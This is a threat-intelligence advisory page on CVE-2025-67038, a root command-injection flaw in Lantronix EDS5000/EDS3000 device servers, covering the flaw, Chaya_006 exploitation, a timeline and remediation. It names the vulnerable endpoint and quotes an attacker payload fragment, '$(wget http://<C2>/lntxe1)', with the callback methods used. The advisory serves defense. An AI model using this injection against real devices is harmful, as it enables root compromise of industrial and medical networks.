Threat reportVulnerabilityTL-2026-1019

CVE-2025-67038: Critical Code Injection in Lantronix EDS5000 Series Under Active Exploitation

criticalACTIVE

CVE-2025-67038 (TL-2026-1019), also tracked as BRIDGE:BREAK (Lantronix EDS5000 component), is a critical-severity software vulnerability scored CVSS 9.8, first published 2026-06-30. It is attributed to Chaya_006 with low confidence, affects Lantronix EDS5000 Series, references 1 CVE (CVE-2025-67038), maps to 18 MITRE ATT&CK techniques (T1046, T1059, T1068), and is covered by 9 detection rules and 35 indicators of compromise.

CVSS
9.8/10Critical
CVEs
1Referenced vulnerabilities
Techniques
18MITRE ATT&CK
Actors
1Chaya_006
Detection rules
9SPL · KQL · Sigma
IOCs
35Indicators of compromise

Key facts for TL-2026-1019

Threat ID
TL-2026-1019
Also known as
BRIDGE:BREAK (Lantronix EDS5000 component)
Severity
CRITICAL
CVSS
9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Status
ACTIVE
Category
VULNERABILITY
First published
Last reviewed
Attribution
Chaya_006
Attribution confidence
LOW
Motivation
UNKNOWN
Target sectors
industrial control systems, health, manufacturing, critical infrastructure, government administration, utilities, operational technology
Target regions
Global, North America, Asia-Pacific
Detection rules
9
Indicators of compromise
35

Malware and tooling in CVE-2025-67038

Malware and tooling: nip.io wildcard DNS

How CVE-2025-67038 works

CISA warns of active exploitation of CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command injection flaw in Lantronix EDS5000/EDS3000 serial-to-IP device servers. The LuCI HTTP JSON-RPC authentication module concatenates the username parameter directly into a shell logging command without sanitization, letting attackers execute arbitrary commands as root via /cgi-bin/luci/rpc/auth. Forescout's Chaya_006 activity cluster has exploited this flaw against honeypots since April 5, 2026, alongside a parallel 4,100+ attempt brute-force campaign; CISA added the CVE to its KEV catalog on June 23, 2026 with a June 26 FCEB remediation deadline.

CVE-2025-67038 is a critical (CVSS 3.1: 9.8) unauthenticated OS command injection vulnerability affecting the Lantronix EDS5000 series (EDS5008, EDS5016, EDS5032) and EDS3000 series (EDS3000PS) serial-to-IP device servers, which are widely deployed to bridge legacy serial equipment (SCADA/ICS controllers, medical devices, building automation systems) to IP networks. The vulnerability resides in the LuCI-derived HTTP JSON-RPC authentication module: when a login attempt to /cgi-bin/luci/rpc/auth fails, the device writes a log entry by concatenating the supplied username directly into a shell command string that is then passed to os.execute() without any input sanitization or escaping. By supplying a username containing shell metacharacters and command substitution syntax (e.g. $(...) or backticks), an unauthenticated remote attacker can execute arbitrary operating system commands with root privileges on the device.

The flaw is one of 22 vulnerabilities disclosed by Forescout Vedere Labs on April 21, 2026 under the umbrella research name BRIDGE:BREAK, which collectively affect Lantronix (8 CVEs across EDS3000PS/EDS5000) and Silex (14 CVEs in the SD330-AC) serial-to-IP converter product lines. BRIDGE:BREAK vulnerability classes span remote code execution (CVE-2026-32955, CVE-2026-32956, CVE-2025-67041), authentication bypass (CVE-2026-32960, CVE-2025-67039), denial-of-service (CVE-2026-32961, CVE-2015-5621), firmware tampering (CVE-2026-32958), arbitrary file upload (CVE-2026-32957), and configuration tampering (CVE-2026-32962, CVE-2026-32964). Forescout demonstrated that chaining these flaws could let an attacker who has already gained a network foothold (e.g. via a compromised industrial router or firewall) pivot through the converter to manipulate sensor readings and actuator behavior in industrial and healthcare OT environments.

Lantronix shipped fixed firmware (2.2.0.0R1 for EDS5000, 3.2.0.0R2 for EDS3000) on February 20, 2026, roughly seven weeks before the CVE was published to NVD on March 11, 2026 and two months before the BRIDGE:BREAK report. Despite the early patch, Forescout observed a threat cluster it tracks as Chaya_006 exploiting CVE-2025-67038 against its honeypots beginning April 5, 2026 — after the patch shipped, suggesting the attackers reverse-engineered the fix (a classic patch-diffing scenario) to construct a working exploit. Chaya_006 traffic used lntxe-prefixed marker strings ($(wget http://<C2>/lntxe1) through lntxea) to fingerprint successful command execution across multiple retrieval methods (wget, busybox wget, curl, Python urllib, raw /dev/tcp sockets, and DNS-based nslookup callbacks to a nip.io wildcard domain), indicating methodical capability testing rather than opportunistic scanning. A second wave on April 6 targeted a related luci_username parameter on other /cgi-bin/luci/ endpoints with both id-command and outbound-callback payloads. In parallel, Forescout tracked a distinct brute-force campaign (Jan 28 - Jun 6, 2026) totaling over 4,100 login attempts across three waves, using four usernames and 200+ password combinations against OpenWRT-derived LuCI credential endpoints, with 'root' as the primary target username.

CISA added CVE-2025-67038 to its Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, mandating FCEB agency remediation by June 26, 2026 under Binding Operational Directive 26-04. Shodan telemetry cited in coverage identifies roughly 31,850-32,000 internet-exposed OpenWRT LuCI-based devices, of which ~5,000 are believed to be honeypots and ~27,000 are believed to be genuine production systems, underscoring a substantial internet-facing attack surface for an OT-adjacent RCE bug.

MITRE ATT&CK techniques used in TL-2026-1019

Discovery

T1046 Network Service Discovery

Execution

T1059 Command and Scripting Interpreter; T1203 Exploitation for Client Execution

Privilege Escalation

T1068 Exploitation for Privilege Escalation

Command and Control

T1071 Application Layer Protocol; T1105 Ingress Tool Transfer

Initial Access

T1078 Valid Accounts; T1133 External Remote Services; T1190 Exploit Public-Facing Application

Credential Access

T1110 Brute Force; T1552 Unsecured Credentials

Lateral Movement

T1210 Exploitation of Remote Services

Impact

T1499 Endpoint Denial of Service; T1529 System Shutdown/Reboot; T1565 Data Manipulation

Reconnaissance

T1590 Gather Victim Network Information; T1592 Gather Victim Host Information; T1595 Active Scanning

Affected products and versions in CVE-2025-67038

  • Lantronix — EDS5000 Series
    Vulnerable versions: EDS5008 < 2.2.0.0R1; EDS5016 < 2.2.0.0R1; EDS5032 < 2.2.0.0R1
    Fixed in: 2.2.0.0R1
  • Lantronix — EDS3000 Series
    Vulnerable versions: EDS3000PS < 3.2.0.0R2
    Fixed in: 3.2.0.0R2

Remediation for CVE-2025-67038

Patches

  • Lantronix EDS5000 firmware 2.2.0.0R1 (released 2026-02-20)
  • Lantronix EDS3000 firmware 3.2.0.0R2 (released 2026-02-20)

Immediate actions

  • Upgrade Lantronix EDS5000 devices to firmware 2.2.0.0R1 or later
  • Upgrade Lantronix EDS3000 devices to firmware 3.2.0.0R2 or later
  • Remove internet-facing exposure of the /cgi-bin/luci/rpc/auth and /cgi-bin/luci/ management endpoints
  • Block known Chaya_006 and brute-force source IPs at the network perimeter
  • Conduct a compromise assessment on any device that received unauthenticated RPC auth requests with shell metacharacters in the username field

Workarounds

  • Disable or restrict access to the LuCI HTTP JSON-RPC authentication module if firmware update is not immediately possible
  • Place an authenticating reverse proxy or VPN in front of the management interface to block unauthenticated requests

Longer-term hardening

  • Segment serial-to-IP converters onto dedicated, firewalled OT/ICS management VLANs with no direct internet routing
  • Deploy network-based IDS/IPS signatures for command-injection patterns in HTTP RPC username fields
  • Inventory all serial-to-IP bridge devices (Lantronix, Silex, and similar) across the environment and track BRIDGE:BREAK-affected models
  • Enforce strong, unique credentials on all LuCI/OpenWRT-derived management interfaces to blunt brute-force campaigns
  • Establish a firmware patch-verification and diffing process for OT edge devices to detect patch-derived exploit development

CVEs associated with CVE-2025-67038

CVE-2025-67038

Weaknesses (CWE) in CVE-2025-67038

CWE-78, CWE-88

Timeline of CVE-2025-67038

  • First wave of a parallel brute-force campaign begins against OpenWRT-derived LuCI credential endpoints, part of a total 4,100+ attempts recorded through June 6.
  • Lantronix releases fixed firmware 2.2.0.0R1 (EDS5000) and 3.2.0.0R2 (EDS3000) addressing the RPC command injection flaw, ahead of public CVE disclosure.
  • CVE-2025-67038 published to NVD, formally documenting the code injection vulnerability.
  • Second brute-force wave (1,943 attempts) runs through April 2, 2026 against OpenWRT LuCI login endpoints.
  • Forescout Vedere Labs observes threat cluster Chaya_006 launching 139 HTTP requests from IP 38.207.136.2 (Japan) against honeypots, exploiting CVE-2025-67038 via the /cgi-bin/luci/rpc/auth endpoint with 'lntxe'-prefixed command payloads.
  • Chaya_006 conducts a second wave of 67 injection attempts with a modified user-agent, targeting the related luci_username parameter on other /cgi-bin/luci/ endpoints, including id-command and outbound-callback payloads.
  • Six follow-up reconnaissance requests observed from the same Chaya_006 infrastructure.
  • Forescout publishes the BRIDGE:BREAK technical report, disclosing 22 vulnerabilities (including CVE-2025-67038) across Lantronix and Silex serial-to-IP converters.
  • Additional scanner activity observed from 160.238.37.28 (South Korea) and 59.124.166.52 (Taiwan), including proxy authentication header attempts.
  • Third brute-force wave (1,849 attempts) runs through May 6, 2026.
  • Final brute-force wave (133 attempts) runs through June 6, 2026, closing out the 4,100+ attempt campaign.
  • Final documented Chaya_006 exploitation attempt observed, sourced from IP 218.13.42.36 (China), using the user-agent 'openwrt-login-checker/2.0'.
  • CISA adds CVE-2025-67038 to the Known Exploited Vulnerabilities catalog, confirming active exploitation and setting a 3-day remediation mandate under BOD 26-04.
  • CISA-mandated remediation deadline for Federal Civilian Executive Branch (FCEB) agencies to patch or mitigate CVE-2025-67038.
  • The Hacker News publishes coverage of the CISA warning, citing ~31,850 internet-exposed OpenWRT LuCI-based devices identified via Shodan, of which ~5,000 are believed to be honeypots.

Sources cited for CVE-2025-67038

Detection coverage for TL-2026-1019

As of 2026-06-30, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1019 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
35 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats